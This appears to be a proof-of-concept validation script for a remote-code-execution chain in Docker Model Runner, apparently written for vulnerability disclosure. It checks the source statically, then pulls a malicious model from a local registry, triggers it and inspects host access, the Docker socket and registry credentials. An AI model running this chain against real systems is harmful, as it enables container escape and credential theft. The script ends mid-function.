README.md
Rendering markdown...
#!/usr/bin/env python3
#
# Claim validation for the Docker Model Runner RCE.
#
# Static tests read the source. They show the bug exists in the codebase but
# don't show it can actually be triggered. Runtime tests do the latter.
#
# Usage:
# python3 test_claims.py # all tests
# python3 test_claims.py --json # machine output
# python3 test_claims.py --runtime-only # skip static
# python3 test_claims.py --static-only # skip runtime
#
# Env:
# REPO_ROOT path to the model-runner repo (default: ../ from this file)
# REGISTRY_HOST registry host for HTTP probes (default: localhost)
# REGISTRY_PORT registry port (default: 5555)
# PROOF_FILE where the payload writes proof (default: /tmp/poc_rce_proof)
import hashlib
import json
import os
import re
import subprocess
import sys
import time
import urllib.request
import urllib.error
from pathlib import Path
# Environment-driven configuration; each value falls back to a local default.
REPO_ROOT = Path(
    os.getenv("REPO_ROOT", Path(__file__).resolve().parent.parent)
)
REGISTRY_HOST = os.getenv("REGISTRY_HOST", "localhost")
REGISTRY_PORT = int(os.getenv("REGISTRY_PORT", "5555"))
PROOF_FILE = os.getenv("PROOF_FILE", "/tmp/poc_rce_proof")

# Model Runner is on the host so it reaches the registry via localhost
# (port-mapped from the registry container).
PULL_MODEL_NAME = "localhost:{}/evil/rce-model:latest".format(REGISTRY_PORT)
MODEL_RUNNER_URL = "http://model-runner.docker.internal"

# ANSI colour escapes; blanked below when output is piped or --json is used.
GREEN, RED, YELLOW, CYAN = "\033[92m", "\033[91m", "\033[93m", "\033[96m"
BOLD, RESET = "\033[1m", "\033[0m"
if not (sys.stdout.isatty() and "--json" not in sys.argv):
    GREEN = RED = YELLOW = CYAN = BOLD = RESET = ""

# One record per log_result() call; print_summary() reads this list.
results = []
def log_result(claim_id, description, passed, detail="", proves=""):
    """Record the outcome of one check and echo it to stdout.

    Args:
        claim_id: Short identifier of the check (e.g. ``"1a"``).
        description: One-line description printed next to the status.
        passed: Tri-state outcome - True (PASS), False (FAIL), None (SKIP).
        detail: Optional multi-line evidence; printed line by line unless
            ``--json`` is on the command line.
        proves: Optional statement of what a passing result demonstrates.

    The record is appended to the module-level ``results`` list.
    """
    labels = {
        True: f"{GREEN}PASS{RESET}",
        False: f"{RED}FAIL{RESET}",
        None: f"{YELLOW}SKIP{RESET}",
    }
    label = labels[passed]
    record = dict(
        id=claim_id,
        desc=description,
        passed=passed,
        detail=detail,
        proves=proves,
    )
    results.append(record)
    print(f" [{label}] {claim_id}: {description}")

    # Evidence lines are suppressed in --json mode.
    if not detail or "--json" in sys.argv:
        return
    for text in detail.strip().split("\n"):
        print(f" {text}")
def read_file(path):
    """Return the text of ``path`` (relative to ``REPO_ROOT``), or None.

    None is returned when the path does not exist or is not a regular file.
    The file is decoded as UTF-8 regardless of the platform locale, and
    undecodable bytes are replaced rather than raising, so a stray byte in
    a source file cannot abort the whole static scan.
    """
    full = REPO_ROOT / path
    try:
        return full.read_text(encoding="utf-8", errors="replace")
    except (FileNotFoundError, IsADirectoryError, NotADirectoryError):
        # Callers treat None as "file not present in this checkout".
        return None
def grep_file(path, pattern):
    """Return ``(line_number, stripped_line)`` for each line matching ``pattern``.

    ``path`` is resolved through ``read_file``; an unreadable file yields an
    empty list. Line numbers are 1-based and ``pattern`` is applied with
    ``re.search`` to the unstripped line.
    """
    text = read_file(path)
    if text is None:
        return []
    hits = []
    for number, raw in enumerate(text.split("\n"), start=1):
        if re.search(pattern, raw):
            hits.append((number, raw.strip()))
    return hits
def http_get(url, timeout=5):
    """GET ``url`` and return ``(status, body)`` without ever raising.

    Returns:
        ``(status_code, body_bytes)`` for any HTTP response, including
        error statuses, or ``(None, error_message)`` when no HTTP response
        was obtained (bad URL, connection failure, timeout, ...).
    """
    try:
        # The context manager closes the connection once the body is read.
        with urllib.request.urlopen(urllib.request.Request(url), timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        # An HTTPError is itself a response object; read it, then release it.
        try:
            return e.code, e.read()
        finally:
            e.close()
    except Exception as e:
        # Deliberate best-effort: callers treat a None status as "not reachable".
        return None, str(e)
def docker_run(args, timeout=30):
    """Run ``curlimages/curl:latest`` in a throwaway container.

    ``args`` (a list) is appended after the image name on the ``docker run``
    command line. Returns ``(returncode, stdout, stderr)``; when the call
    times out or the docker executable is missing the tuple is
    ``(-1, "", "timeout")`` or ``(-1, "", "docker not found")``.
    """
    # minimal container - truly unprivileged
    base_cmd = [
        "docker", "run", "--rm", "--no-healthcheck",
        "--security-opt=no-new-privileges",
        "curlimages/curl:latest",
    ]
    try:
        proc = subprocess.run(
            base_cmd + args,
            capture_output=True,
            text=True,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return -1, "", "timeout"
    except FileNotFoundError:
        return -1, "", "docker not found"
    return proc.returncode, proc.stdout, proc.stderr
# Claim 1 - blob digest verification is absent (static)
def test_claim_1():
    """Static check of claim 1: downloaded blobs are not digest-verified.

    Reads ``pkg/distribution/internal/store/blobs.go`` and records:

    * 1a - inside ``WriteBlobWithResume`` no ``oci.SHA256`` call sits between
      ``io.Copy(f, r)`` and the following ``os.Rename``.
    * 1b - ``oci.SHA256`` is defined, but every call in blobs.go precedes
      the io.Copy line.
    * 1c - no verification-looking keyword appears between the two lines.

    If blobs.go is missing, only a failing 1a is recorded. If the io.Copy /
    os.Rename markers cannot be located, 1c is recorded as untested instead
    of crashing while formatting its line range.
    """
    print(f"\n{BOLD}{CYAN}Claim 1: blob digest verification is absent{RESET}")
    blobs_go = read_file("pkg/distribution/internal/store/blobs.go")
    if blobs_go is None:
        log_result("1a", "blobs.go not found", False,
                   f"Expected at {REPO_ROOT}/pkg/distribution/internal/store/blobs.go")
        return
    lines = blobs_go.split("\n")

    # 1a - find io.Copy in WriteBlobWithResume, confirm no hash after it
    in_func = False
    io_copy_line = None
    rename_line = None
    for i, line in enumerate(lines, 1):
        if "func" in line and "WriteBlobWithResume" in line:
            in_func = True
        if not in_func:
            continue
        if io_copy_line is None and "io.Copy(f, r)" in line:
            io_copy_line = i
        if io_copy_line and rename_line is None and "os.Rename" in line:
            rename_line = i
    located = io_copy_line is not None and rename_line is not None

    # Only an actual oci.SHA256 call between the two markers counts as a hash.
    hash_between = located and any(
        "oci.SHA256" in lines[i - 1] for i in range(io_copy_line, rename_line)
    )
    log_result("1a",
               "WriteBlobWithResume: io.Copy at line {}, os.Rename at line {}, no hash between".format(
                   io_copy_line, rename_line),
               located and not hash_between,
               f"Lines {io_copy_line}-{rename_line}: raw copy then immediate rename, no verification.",
               proves="Download path writes bytes to disk and renames to final path with "
                      "no digest check anywhere in between.")

    # 1b - SHA256 exists but only in the resume path (before io.Copy)
    hash_go = read_file("pkg/distribution/oci/hash.go")
    sha256_exists = hash_go is not None and "func SHA256(" in hash_go
    sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go", r"oci\.SHA256\(")
    all_before_copy = all(ln < (io_copy_line or 0) for ln, _ in sha256_calls)
    log_result("1b",
               "SHA256 exists but only called in the resume path (before io.Copy)",
               sha256_exists and len(sha256_calls) > 0 and all_before_copy,
               f"oci.SHA256 calls at lines: {[ln for ln, _ in sha256_calls]}. "
               f"io.Copy at line {io_copy_line}. All calls precede the download.",
               proves="The hash function exists but is never applied to a fresh download. "
                      "It's only used to decide whether an .incomplete file is already done.")

    # 1c - nothing after io.Copy verifies the content before rename
    if not located:
        # Without both markers there is no range to scan (and no line
        # numbers to format), so the check is reported as untested.
        log_result("1c",
                   "No verification code between io.Copy and os.Rename",
                   None,
                   "Could not locate io.Copy(f, r) / os.Rename in WriteBlobWithResume; "
                   "nothing was scanned.")
        return
    check_words = ["digest", "hash", "verify", "compare", "SHA256", "sha256", "checksum"]
    post_copy_checks = []
    for i in range(io_copy_line + 1, rename_line):
        line = lines[i - 1]
        if any(w in line for w in check_words) and not line.strip().startswith("//"):
            post_copy_checks.append((i, line.strip()))
    log_result("1c",
               "No verification code between io.Copy and os.Rename",
               len(post_copy_checks) == 0,
               f"Checked lines {io_copy_line+1}-{rename_line-1}: "
               f"{'no verification found' if not post_copy_checks else post_copy_checks}",
               proves="A malicious registry can serve any bytes for a given declared digest "
                      "and Model Runner stores them without complaint.")
# Claim 2 - registry serves model, Model Runner accepts it (runtime)
def test_claim_2():
    """Runtime check of claim 2: Model Runner pulls from the PoC registry.

    Records 2a (registry self-test), 2b (pull through Model Runner from a
    container) and 2c (model shows up in ``/api/tags``). When a prerequisite
    is unavailable (registry down, docker missing, Model Runner unreachable)
    the remaining checks are recorded as skipped.
    """
    print(f"\n{BOLD}{CYAN}Claim 2: malicious registry accepted by Model Runner{RESET}")

    # 2a - PoC registry is up and internally consistent
    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
    if status is None or status != 200:
        log_result("2a", "Registry self-test", None,
                   f"Registry not reachable at {REGISTRY_HOST}:{REGISTRY_PORT}: {body}")
        log_result("2b", "Model Runner accepts pull", None, "Registry not running")
        log_result("2c", "Pulled model appears in model list", None, "Registry not running")
        return
    try:
        selftest = json.loads(body)
        if not isinstance(selftest, dict):
            raise ValueError(f"expected a JSON object, got {type(selftest).__name__}")
    except ValueError as e:
        # A 200 with an unparseable body means something other than the PoC
        # registry answered; report it instead of crashing the run.
        log_result("2a", "Registry self-test", False,
                   f"Self-test endpoint returned an unusable response: {e}")
        log_result("2b", "Model Runner accepts pull", None, "Registry self-test unusable")
        log_result("2c", "Pulled model appears in model list", None, "Registry self-test unusable")
        return
    log_result("2a", "Registry self-test passes (digests consistent, valid OCI)",
               selftest.get("passed") is True,
               f"Blob count: {selftest.get('blob_count')}, errors: {selftest.get('errors')}",
               proves="The PoC serves valid OCI content. All digests match, this isn't "
                      "a malformed artifact.")

    # 2b - pull the model via Model Runner from inside a container.
    # -S keeps curl's error text visible despite -s, so the reachability
    # checks below have something to match on.
    rc, stdout, stderr = docker_run([
        "sh", "-c",
        f'curl -sSf -X POST {MODEL_RUNNER_URL}/api/pull '
        f'-H "Content-Type: application/json" '
        f'-d \'{{"name": "{PULL_MODEL_NAME}"}}\' 2>&1'
    ], timeout=60)
    if rc == -1 and "docker not found" in stderr:
        log_result("2b", "Pull model via Model Runner", None, "docker not available")
        log_result("2c", "Pulled model in model list", None, "docker not available")
        return
    # curl exit codes: 6 = could not resolve host, 7 = failed to connect.
    unreachable = (rc in (6, 7)
                   or "Could not resolve host" in stdout
                   or "Connection refused" in stdout)
    if unreachable:
        log_result("2b", "Pull model via Model Runner", None,
                   f"Model Runner not reachable: {stdout[:200]}")
        log_result("2c", "Pulled model in model list", None, "Model Runner not reachable")
        return
    pull_ok = rc == 0 and "error" not in stdout.lower()
    log_result("2b", "Model Runner pulls from a malicious registry without complaint",
               pull_ok,
               f"Exit code: {rc}\nResponse: {stdout[:300]}",
               proves="Model Runner accepted a model from an attacker-controlled registry. "
                      "Pull completed, no digest verification failure.")

    # 2c - verify the model appears in the list
    rc2, stdout2, stderr2 = docker_run([
        "sh", "-c",
        f'curl -sf {MODEL_RUNNER_URL}/api/tags 2>&1'
    ], timeout=15)
    model_listed = PULL_MODEL_NAME.replace(":latest", "") in stdout2 or "evil" in stdout2.lower()
    log_result("2c", "Pulled model appears in Model Runner's model list",
               model_listed if rc2 == 0 else None,
               f"Model list response: {stdout2[:300]}",
               proves="Malicious model is stored and available for inference.")
# Claim 3 - Python backends enable trust_remote_code (static + runtime)
def test_claim_3():
    """Static check of claim 3: the Go launchers never touch trust_remote_code.

    Records 3a (no backend source mentions the trust-remote-code flag) and
    3b (vllm_metal.go passes ``--model``). 3a is reported as untested when
    none of the backend files could be read, so a changed repository layout
    cannot produce a vacuous PASS.
    """
    print(f"\n{BOLD}{CYAN}Claim 3: Python backends enable trust_remote_code{RESET}")

    # 3a - Go side doesn't pass --no-trust-remote-code anywhere
    backend_files = [
        ("vllm", "pkg/inference/backends/vllm/vllm.go"),
        ("vllm-metal", "pkg/inference/backends/vllm/vllm_metal.go"),
        ("vllm-config", "pkg/inference/backends/vllm/vllm_config.go"),
        ("mlx", "pkg/inference/backends/mlx/mlx.go"),
        ("sglang", "pkg/inference/backends/sglang/sglang.go"),
    ]
    trust_flag_found = {}
    missing = []
    for name, path in backend_files:
        content = read_file(path)
        if content is None:
            missing.append(path)
            continue
        if "trust-remote-code" in content or "trust_remote_code" in content:
            trust_flag_found[name] = grep_file(path, r"trust.remote.code")
    searched = len(backend_files) - len(missing)
    log_result("3a",
               "No backend passes --no-trust-remote-code or --trust-remote-code",
               len(trust_flag_found) == 0 if searched else None,
               f"Searched {searched} of {len(backend_files)} backend files. "
               f"Flag references: {trust_flag_found if trust_flag_found else 'none'}"
               + (f"\nNot found: {missing}" if missing else ""),
               proves="The Go launcher never disables vLLM's default trust_remote_code behavior. "
                      "vLLM imports code referenced by auto_map in tokenizer_config.json. "
                      "(The actual trust_remote_code=True default lives in the upstream vLLM "
                      "package, not this repo. This test only confirms the Go side doesn't "
                      "override it.)")

    # 3b - vllm-metal passes --model pointing at an unverified directory
    vllm_metal = read_file("pkg/inference/backends/vllm/vllm_metal.go")
    passes_model_path = vllm_metal is not None and '"--model"' in vllm_metal
    log_result("3b",
               "vllm-metal passes --model <path> where path is the unverified blob store",
               passes_model_path,
               "vllm_metal.go passes --model pointing to the bundle directory. The contents\n"
               "come from the blob store, which has no integrity checks (claim 1).\n"
               "AutoTokenizer.from_pretrained() with trust_remote_code=True then imports any\n"
               ".py referenced by auto_map in tokenizer_config.json.",
               proves="The path given to vLLM points at attacker-controlled content. With "
                      "claim 3a, that means arbitrary Python import from the model dir.")
# Claim 4 - Python backends run without sandboxing (static)
def test_claim_4():
    """Static check of claim 4: Python backends launch with an empty SandboxConfig.

    Records 4a (every listed Python backend source contains
    ``SandboxConfig: ""``) and 4b (llamacpp.go assigns a
    ``sandbox.Configuration``, shown as a contrast).
    """
    print(f"\n{BOLD}{CYAN}Claim 4: Python backends run without sandboxing{RESET}")
    python_backends = {
        "vllm": "pkg/inference/backends/vllm/vllm.go",
        "vllm-metal": "pkg/inference/backends/vllm/vllm_metal.go",
        "mlx": "pkg/inference/backends/mlx/mlx.go",
        "sglang": "pkg/inference/backends/sglang/sglang.go",
        "diffusers": "pkg/inference/backends/diffusers/diffusers.go",
    }

    # Partition the backends by whether the empty-config literal is present.
    unsandboxed, sandboxed = [], []
    for name, path in python_backends.items():
        hits = grep_file(path, r'SandboxConfig:\s*""')
        if not hits:
            sandboxed.append(name)
            continue
        first_line = hits[0][0]
        unsandboxed.append(f"{name} (line {first_line})")

    every_backend_open = len(unsandboxed) == len(python_backends)
    log_result("4a",
               f"All {len(python_backends)} Python backends have SandboxConfig=\"\"",
               every_backend_open,
               f"Unsandboxed: {unsandboxed}\nSandboxed: {sandboxed if sandboxed else 'none'}",
               proves="No OS-level sandbox on any Python backend. Code imported via "
                      "trust_remote_code runs with the full privileges of the Model Runner "
                      "process (the Docker Desktop user).")

    # 4b - contrast: llama.cpp IS sandboxed
    llamacpp = grep_file(
        "pkg/inference/backends/llamacpp/llamacpp.go",
        r"SandboxConfig.*sandbox\.Configuration",
    )
    llamacpp_sandboxed = len(llamacpp) > 0
    log_result("4b",
               "llama.cpp (C++ backend) actually configures a sandbox",
               llamacpp_sandboxed,
               f"llama.cpp: {llamacpp}",
               proves="The codebase knows how to sandbox backends. Python ones being unsandboxed "
                      "is a choice (or at least a gap), not a missing framework.")
# Claim 5 - internal API has no auth (static + runtime)
def test_claim_5():
    """Check claim 5: the Model Runner API is reachable without authentication.

    Records 5a-code (endpoint name present in launch.go), 5b (no auth
    keywords in the HTTP handler sources), 5c (the CORS middleware only
    rejects non-empty disallowed Origins) and 5d-runtime (an unprivileged
    container reaches ``/api/tags``). 5b and 5c are reported as untested
    when their source files cannot be read. Note that 5d shells out to
    docker even though the rest of this function is static.
    """
    print(f"\n{BOLD}{CYAN}Claim 5: internal API reachable without auth{RESET}")

    # 5a - model-runner.docker.internal is the configured endpoint
    launch_go = read_file("cmd/cli/commands/launch.go")
    has_endpoint = launch_go is not None and "model-runner.docker.internal" in launch_go
    log_result("5a-code",
               "model-runner.docker.internal endpoint configured in launch.go",
               has_endpoint,
               proves="Docker Desktop exposes Model Runner to every container at this address.")

    # 5b - no auth middleware on API handlers
    handler_files = [
        "pkg/ollama/http_handler.go",
        "pkg/inference/scheduling/http_handler.go",
        "pkg/inference/models/http_handler.go",
    ]
    # One alternation so a line matching several keywords is reported once.
    auth_pattern = r"authMiddleware|requireAuth|checkAuth|apiKey|api_key|Authorization"
    auth_evidence = []
    searched = 0
    for path in handler_files:
        if not read_file(path):
            continue
        searched += 1
        for ln, line in grep_file(path, auth_pattern):
            # exclude: bearer tokens (used for upstream registry auth), comments
            if "bearer" in line.lower() or line.startswith("//"):
                continue
            auth_evidence.append(f"{path}:{ln}: {line}")
    log_result("5b",
               "No authentication middleware on API handlers",
               len(auth_evidence) == 0 if searched else None,
               f"Searched {searched} of {len(handler_files)} handler files.\n"
               f"Auth enforcement: {auth_evidence if auth_evidence else 'none'}",
               proves="/api/pull and /engines/v1/chat/completions take requests from any "
                      "container with no credentials.")

    # 5c - CORS only blocks requests WITH a disallowed Origin
    cors_go = read_file("pkg/middleware/cors.go")
    if cors_go:
        has_origin_check = 'r.Header.Get("Origin")' in cors_go
        # key line: `if origin != "" && !allowed` - empty origin is never blocked
        guard_lines = [ln for ln, _ in grep_file("pkg/middleware/cors.go", r'origin != ""')]
        allows_empty_origin = bool(guard_lines)
        where = ", ".join(str(ln) for ln in guard_lines) or "?"
        log_result("5c",
                   "CORS only blocks if Origin is set and not allowed (empty Origin passes)",
                   has_origin_check and allows_empty_origin,
                   f'cors.go line {where}: `if origin != "" && !allowed` -> 403.\n'
                   "Requests with no Origin (all container curl requests) are never blocked.\n"
                   "CORS is a browser-only thing.",
                   proves="The only access control (CORS) does nothing for container-to-API "
                          "requests. No defense against non-browser clients.")
    else:
        log_result("5c",
                   "CORS only blocks if Origin is set and not allowed (empty Origin passes)",
                   None,
                   "pkg/middleware/cors.go not found or empty; nothing was checked.")

    # 5d - runtime: reach Model Runner from an unprivileged container
    rc, stdout, stderr = docker_run([
        "-s", "-o", "/dev/null", "-w", "%{http_code}",
        f"{MODEL_RUNNER_URL}/api/tags"
    ], timeout=15)
    if rc == -1 and "docker not found" in stderr:
        log_result("5d-runtime", "Container can reach Model Runner API", None,
                   "docker not available")
        return
    status_code = stdout.strip()
    if status_code in ("000", ""):
        log_result("5d-runtime", "Container can reach Model Runner API", None,
                   f"Model Runner not reachable (HTTP {status_code}). "
                   "Is Docker Desktop Model Runner enabled?")
    else:
        log_result("5d-runtime",
                   f"Unprivileged container reaches Model Runner API (HTTP {status_code})",
                   status_code == "200",
                   "Container ran with --no-healthcheck --security-opt=no-new-privileges.\n"
                   "No Docker socket mount, no --privileged, no caps.",
                   proves="Unprivileged container with default config reaches the API.")
# Claim 6 - RCE on host as Docker Desktop user (runtime)
def test_claim_6():
    """Runtime check of claim 6: evaluate the proof file written by the payload.

    Reads ``PROOF_FILE`` (JSON) and records 6a-6g from its fields. The file
    is produced by the payload, so its values are treated defensively:
    a missing, unreadable or non-object file marks 6a-6c as skipped, and
    fields of an unexpected type are coerced rather than allowed to raise.
    """
    print(f"\n{BOLD}{CYAN}Claim 6: code executes on host as Docker Desktop user{RESET}")
    proof_path = Path(PROOF_FILE)
    if not proof_path.exists():
        log_result("6a", "Host-level code execution", None,
                   f"Proof file {PROOF_FILE} missing.\n"
                   "Run the full attack first (./run_poc.sh full)")
        log_result("6b", "Host filesystem access", None, "Proof file missing")
        log_result("6c", "Runs as Docker Desktop user", None, "Proof file missing")
        return
    try:
        proof = json.loads(proof_path.read_text())
        if not isinstance(proof, dict):
            raise ValueError(f"expected a JSON object, got {type(proof).__name__}")
    except (ValueError, OSError) as e:
        # ValueError covers json.JSONDecodeError and undecodable bytes.
        log_result("6a", "Host-level code execution", None,
                   f"Proof file exists but is unreadable: {e}")
        log_result("6b", "Host filesystem access", None, "Proof file unreadable")
        log_result("6c", "Runs as Docker Desktop user", None, "Proof file unreadable")
        return

    # 6a - code executed
    log_result("6a", "Arbitrary code executed on host",
               proof.get("rce") is True,
               f"Hostname: {proof.get('hostname')}\n"
               f"User: {proof.get('user')}\n"
               f"PID: {proof.get('pid')}",
               proves="evil_tokenizer.py ran and wrote proof to the HOST filesystem "
                      "(not inside a container).")

    # 6b - host filesystem access
    log_result("6b", "Process has host filesystem access",
               proof.get("can_read_etc_passwd") is True,
               f"Can read /etc/passwd: {proof.get('can_read_etc_passwd')}\n"
               f"Can write /tmp: {proof.get('can_write_tmp')}\n"
               f"Working dir: {proof.get('cwd')}\n"
               f"Model dir: {proof.get('model_dir')}",
               proves="Process can read sensitive host files (/etc/passwd) and write "
                      "to host directories (/tmp). Not sandboxed.")

    # 6c - Docker Desktop user (not root, not container user)
    raw_uid = proof.get("uid", "")
    raw_user = proof.get("user", "")
    # Coerce to text so a null or numeric value cannot break the checks below.
    uid_str = "" if raw_uid is None else str(raw_uid)
    user = "" if raw_user is None else str(raw_user)
    # Root shows up as "uid=0" in id-style output, or as a bare 0 if numeric.
    is_root = user == "root" or "uid=0" in uid_str or uid_str.strip() == "0"
    is_host_user = user != "" and not is_root
    log_result("6c", f"Runs as host user '{user}' (not root, not container user)",
               is_host_user,
               f"uid line: {uid_str}\n"
               f"HOME: {proof.get('env_HOME')}",
               proves="Code runs as the Docker Desktop user with their full privileges, "
                      "file access, network.")

    # Container escape proof - host RCE can control the Docker daemon, which
    # gives full container escape: unpriv container -> host RCE -> daemon -> any container.

    # 6d - Docker socket accessible from host
    socket_exists = proof.get("docker_socket_exists")
    socket_writable = proof.get("docker_socket_writable")
    if socket_exists is None:
        log_result("6d", "Docker socket accessible from host-side payload", None,
                   "Proof file missing docker_socket fields (older payload)")
    else:
        log_result("6d", "Docker socket accessible from host-side payload",
                   socket_exists is True,
                   f"Socket exists: {socket_exists}\n"
                   f"Socket writable: {socket_writable}",
                   proves="Host-side payload can hit the Docker socket. Attacker controls "
                          "the daemon from code that started life in an unprivileged container.")

    # 6e - can enumerate every running container
    docker_ps = proof.get("docker_ps")
    raw_count = proof.get("docker_ps_count", 0)
    ps_count = raw_count if isinstance(raw_count, int) else 0
    if docker_ps is None:
        log_result("6e", "Host-side payload can enumerate all containers", None,
                   "docker ps not available or failed")
    else:
        log_result("6e", f"Host-side payload sees {ps_count} running container(s) via docker ps",
                   ps_count > 0,
                   f"docker ps output:\n{docker_ps}",
                   proves="From host-side RCE, attacker sees every container. With socket "
                          "write access they can exec into, stop, or create more.")

    # 6f - Docker daemon version accessible
    docker_ver = proof.get("docker_version")
    if docker_ver is None:
        log_result("6f", "Host-side payload can query Docker daemon", None,
                   "docker version not available or failed")
    else:
        log_result("6f", f"Host-side payload talks to Docker daemon (v{docker_ver})",
                   len(str(docker_ver)) > 0,
                   f"Docker version: {docker_ver}",
                   proves="Payload talks to the Docker daemon API. Equivalent to having "
                          "the socket mounted: create privileged containers, mount the "
                          "host filesystem, pivot elsewhere.")

    # 6g - Docker credentials readable
    config_exists = proof.get("docker_config_exists")
    has_auths = proof.get("docker_config_has_auths")
    raw_registries = proof.get("docker_config_registries", [])
    registries = raw_registries if isinstance(raw_registries, list) else []
    if config_exists is None:
        log_result("6g", "Docker registry credentials accessible from host", None,
                   "docker_config fields missing from proof")
    elif not config_exists:
        log_result("6g", "Docker registry credentials file not present", None,
                   "~/.docker/config.json doesn't exist (no registries logged in)")
    else:
        log_result("6g",
                   f"Docker config accessible ({len(registries)} registries)",
                   config_exists is True,
                   f"~/.docker/config.json exists: {config_exists}\n"
                   f"Has auth entries: {has_auths}\n"
                   f"Registries: {registries}\n"
                   "NOTE: actual credentials are NOT exfiltrated, only proving access.",
                   proves="Attacker can read Docker registry creds from the host. Supply chain "
                          "attacks: push malicious images to any registry the user is logged into.")
# Claim 7 - malicious content persists (static)
def test_claim_7():
    """Static check of claim 7: stored blobs are never re-verified.

    Records 7a (no hash/verify keyword inside a New/Open/Init/Load function
    of store.go) and 7b (blobs.go calls ``hasBlob`` and returns early on
    it). 7a is reported as untested when store.go cannot be read, rather
    than passing on a file that was never inspected.
    """
    print(f"\n{BOLD}{CYAN}Claim 7: malicious content persists in blob store{RESET}")
    store_go = read_file("pkg/distribution/internal/store/store.go")

    # 7a - no integrity check during store init/open
    if not store_go:
        log_result("7a", "No integrity check when the blob store is opened",
                   None,
                   "pkg/distribution/internal/store/store.go not found or empty; "
                   "nothing was checked.")
    else:
        init_verifies = False
        in_init = False
        for line in store_go.split("\n"):
            if re.match(r'func.*\b(New|Open|Init|Load)\b', line):
                in_init = True
            if not in_init:
                continue
            mentions_check = any(
                w in line for w in ["SHA256", "verify", "integrity", "checksum"])
            if mentions_check and not line.strip().startswith("//"):
                init_verifies = True
                break
            # A closing brace in column 0 ends the top-level Go function.
            if line.startswith("}"):
                in_init = False
        log_result("7a", "No integrity check when the blob store is opened",
                   not init_verifies,
                   f"Checked every New/Open/Init/Load in store.go.\n"
                   f"Integrity check found: {init_verifies}",
                   proves="Once stored, a blob is never re-verified. A malicious model "
                          "survives Docker Desktop restarts.")

    # 7b - hasBlob early-returns for existing blobs
    has_blob = grep_file("pkg/distribution/internal/store/blobs.go", r"hasBlob\(")
    early_return = grep_file("pkg/distribution/internal/store/blobs.go",
                             r"if hasBlob\b")
    log_result("7b", "Existing blobs skip re-download (hasBlob early return)",
               len(has_blob) > 0 and len(early_return) > 0,
               f"hasBlob calls: {len(has_blob)}, early returns: {len(early_return)}",
               proves="Re-pulling the same model skips download if blobs exist. Tampered "
                      "content never gets refreshed or re-verified.")
# Edge cases
def test_edge_cases():
    """Static edge-case checks E1-E4 that scope the main claims.

    E1: the resume path's SHA256 comparison exists in blobs.go.
    E2: no manifest digest verification call in the pull-path sources.
    E3: bundle unpacking contains path traversal guards.
    E4: the CORS middleware reads the Origin header.

    E2 and E4 are reported as untested when the files they inspect cannot
    be read, so a missing file never counts as evidence.
    """
    print(f"\n{BOLD}{CYAN}Edge cases{RESET}")

    # E1 - resume path only checks completeness, not fresh downloads
    sha256_calls = grep_file("pkg/distribution/internal/store/blobs.go",
                             r"oci\.SHA256\(existingFile\)")
    compare_calls = grep_file("pkg/distribution/internal/store/blobs.go",
                              r"computedHash.*==.*diffID")
    log_result("E1",
               "Resume-path SHA256 only checks if an .incomplete file is already complete",
               len(sha256_calls) > 0 and len(compare_calls) > 0,
               "The SHA256 check runs only when an .incomplete file is sitting around from\n"
               "a previous interrupted download. It checks whether the file is already complete\n"
               "(hash matches diffID). It does not run on fresh downloads.",
               proves="The presence of SHA256 in the resume path isn't digest verification of "
                      "downloaded content.")

    # E2 - manifest not crypto-verified after fetch
    # ComputeDigest() exists but isn't called during pull.
    pull_path_files = [
        "pkg/distribution/oci/remote/remote.go",
        "pkg/distribution/internal/store/store.go",
        "pkg/distribution/distribution/client.go",
    ]
    searched = [p for p in pull_path_files if read_file(p) is not None]
    manifest_verify_calls = []
    for path in searched:
        matches = grep_file(path, r"(\.ComputeDigest\(\)|verifyManifest|manifest.*SHA256)")
        manifest_verify_calls.extend([(path, ln, line) for ln, line in matches
                                      if not line.strip().startswith("//")])
    compute_digest_def = grep_file("pkg/distribution/oci/manifest.go", r"func.*ComputeDigest")
    log_result("E2",
               "Manifest content not cryptographically verified after fetch",
               len(manifest_verify_calls) == 0 if searched else None,
               f"Files searched: {len(searched)} of {len(pull_path_files)}\n"
               f"ComputeDigest() defined: {bool(compute_digest_def)}, "
               f"called during pull: {bool(manifest_verify_calls)}\n"
               f"Call sites found: {manifest_verify_calls if manifest_verify_calls else 'none'}",
               proves="Trust comes entirely from TLS. A compromised registry or MITM with a "
                      "valid TLS cert can serve arbitrary manifests.")

    # E3 - path traversal protections exist (showing what IS protected)
    path_checks = grep_file("pkg/distribution/internal/bundle/unpack.go",
                            r"(validatePathWithinDirectory|filepath\.IsLocal)")
    log_result("E3",
               "Bundle unpacking has path traversal protections",
               len(path_checks) > 0,
               f"Safety checks found: {len(path_checks)} locations",
               proves="Path traversal via layer annotations is blocked. The attack vector here "
                      "is code execution via trust_remote_code, not path traversal.")

    # E4 - CORS is the only access control
    cors_go = read_file("pkg/middleware/cors.go")
    if cors_go:
        origin_only = 'r.Header.Get("Origin")' in cors_go
        log_result("E4",
                   "CORS (Origin check) is the only access control",
                   origin_only,
                   proves="No IP filtering, no auth tokens, no mTLS. Containers bypass CORS by "
                          "just not sending an Origin header.")
    else:
        log_result("E4",
                   "CORS (Origin check) is the only access control",
                   None,
                   "pkg/middleware/cors.go not found or empty; nothing was checked.")
# Full attack chain (runtime)
def test_full_chain():
    """Run the attack end to end and record CHAIN-1, CHAIN-2 and CHAIN-3.

    Preconditions (docker, PoC registry, Model Runner) are probed first; if
    any is missing a SKIP line is printed and nothing is recorded. The
    steps are: remove stale proof files, pull the model through Model
    Runner (CHAIN-1), send an inference request to trigger model loading
    (CHAIN-2), then poll for the proof or flag file on the host (CHAIN-3).
    """
    print(f"\n{BOLD}{CYAN}Full attack chain{RESET}")

    # --- preconditions -----------------------------------------------------
    try:
        r = subprocess.run(["docker", "info"], capture_output=True, timeout=10)
        if r.returncode != 0:
            print(f" {YELLOW}SKIP{RESET}: docker not running")
            return
    except (FileNotFoundError, subprocess.TimeoutExpired):
        print(f" {YELLOW}SKIP{RESET}: docker not available")
        return
    status, body = http_get(f"http://{REGISTRY_HOST}:{REGISTRY_PORT}/_poc/selftest")
    if status is None or status != 200:
        print(f" {YELLOW}SKIP{RESET}: registry not running at {REGISTRY_HOST}:{REGISTRY_PORT}")
        return
    rc, stdout, stderr = docker_run([
        "-s", "-o", "/dev/null", "-w", "%{http_code}",
        f"{MODEL_RUNNER_URL}/api/tags"
    ], timeout=15)
    mr_status = stdout.strip()
    if mr_status != "200":
